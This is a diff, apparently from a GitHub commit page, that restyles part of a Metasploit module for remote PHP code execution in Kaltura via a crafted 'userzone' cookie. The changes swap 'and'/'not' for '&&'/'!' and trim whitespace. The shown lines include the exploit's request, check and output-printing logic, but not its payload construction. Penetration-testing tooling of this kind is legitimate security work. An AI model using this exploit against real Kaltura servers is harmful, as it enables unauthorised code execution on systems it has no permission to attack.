@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
9
9
10
10
include Msf ::Exploit ::Remote ::HttpClient
11
11
12
- def initialize ( info = { } )
12
+ def initialize ( info = { } )
13
13
super ( update_info ( info ,
14
14
'Name' => 'Kaltura Remote PHP Code Execution over Cookie' ,
15
15
'Description' => %q{
@@ -32,8 +32,8 @@ def initialize(info={})
32
32
'License' => MSF_LICENSE ,
33
33
'Author' =>
34
34
[
35
- 'Robin Verton <[email protected] >' ,
36
- 'Mehmet Ince <[email protected] >' # first kaltura rce module
35
+ 'Robin Verton <[email protected] >' ,
36
+ 'Mehmet Ince <[email protected] >' # first kaltura rce module
37
37
] ,
38
38
'References' =>
39
39
[
@@ -82,12 +82,12 @@ def check
82
82
'cookie' => "userzone=#{ encoded } #{ hash } "
83
83
)
84
84
85
- if res and res . redirect?
85
+ if res && res . redirect?
86
86
print_error ( "Got a redirect, maybe you are not using https? #{ res . headers [ 'Location' ] } " )
87
87
Exploit ::CheckCode ::Safe
88
88
elsif res && res . body . include? ( r )
89
89
Exploit ::CheckCode ::Vulnerable
90
- elsif not check_entryid
90
+ elsif ! check_entryid
91
91
print_error ( "Invalid ENTRYID" )
92
92
Exploit ::CheckCode ::Safe
93
93
else
@@ -107,7 +107,6 @@ def check_entryid
107
107
)
108
108
109
109
return res . body . include? entry_id
110
-
111
110
end
112
111
113
112
def exploit
@@ -136,13 +135,12 @@ def exploit
136
135
'cookie' => "userzone=#{ encoded } #{ hash } "
137
136
)
138
137
139
- if res and res . redirect?
138
+ if res && res . redirect?
140
139
print_error ( "Got a redirect, maybe you are not using https? #{ res . headers [ 'Location' ] } " )
141
- elsif res and res . code != 200
142
- print_error ( 'Unexpected response...' )
140
+ elsif res && res . code != 200
141
+ print_error ( 'Unexpected response...' )
143
142
else
144
- print_status ( "Output: #{ res . body } " )
143
+ print_status ( "Output: #{ res . body } " )
145
144
end
146
-
147
145
end
148
146
end
0 commit comments